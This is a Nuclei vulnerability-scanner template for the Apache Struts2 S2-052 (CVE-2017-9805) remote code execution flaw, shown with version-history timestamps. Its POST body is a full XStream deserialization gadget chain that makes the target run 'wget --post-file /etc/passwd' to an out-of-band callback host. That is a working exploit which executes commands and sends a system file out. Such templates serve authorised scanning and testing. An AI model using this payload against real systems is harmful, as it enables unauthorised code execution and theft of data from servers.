nuclei-templates/http/cves/2017/CVE-2017-9805.yaml

111 lines
4.6 KiB
YAML
Raw Normal View History

2021-02-21 14:01:07 +00:00
id: CVE-2017-9805
info:
name: Apache Struts2 S2-052 - Remote Code Execution
2021-02-21 14:01:07 +00:00
author: pikpikcu
severity: high
description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type of filtering, which can lead to remote code execution when deserializing XML payloads.
2023-09-06 13:22:34 +00:00
remediation: |
Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2.
reference:
2021-04-18 13:00:27 +00:00
- http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html
- https://struts.apache.org/docs/s2-052.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-9805
2023-07-11 19:49:27 +00:00
- http://www.securitytracker.com/id/1039263
2023-07-15 16:29:17 +00:00
- https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2017-9805
cwe-id: CWE-502
epss-score: 0.97545
epss-percentile: 0.99994
2023-09-06 13:22:34 +00:00
cpe: cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:*
metadata:
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: apache
product: struts
tags: cve,cve2017,apache,rce,struts,kev
2021-02-21 14:01:07 +00:00
http:
2021-02-21 14:01:07 +00:00
- method: POST
path:
- "{{BaseURL}}/struts2-rest-showcase/orders/3"
2021-02-23 01:42:08 +00:00
- "{{BaseURL}}/orders/3"
2023-07-11 19:49:27 +00:00
2021-02-21 14:01:07 +00:00
body: |
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>wget</string>
<string>--post-file</string>
<string>/etc/passwd</string>
2022-03-21 20:17:31 +00:00
<string>{{interactsh-url}}</string>
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>asdasd</name>
</filter>
<next class="string">asdasd</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
2021-02-21 14:01:07 +00:00
2023-07-11 19:49:27 +00:00
headers:
Content-Type: application/xml
2021-02-21 14:01:07 +00:00
matchers-condition: and
matchers:
- type: word
words:
- "Debugging information"
- "com.thoughtworks.xstream.converters.collections.MapConverter"
condition: and
- type: status
status:
- 500
# digest: 4b0a00483046022100fffb5572ea6a3a9e66caeba001ac48de1a809db496abc1d5367643a27b64e550022100e7862b50988b1084007910376221f62bcb95de32c3bd50681d323f776c17ecd5:922c64590222798bb761d5b6d8e72950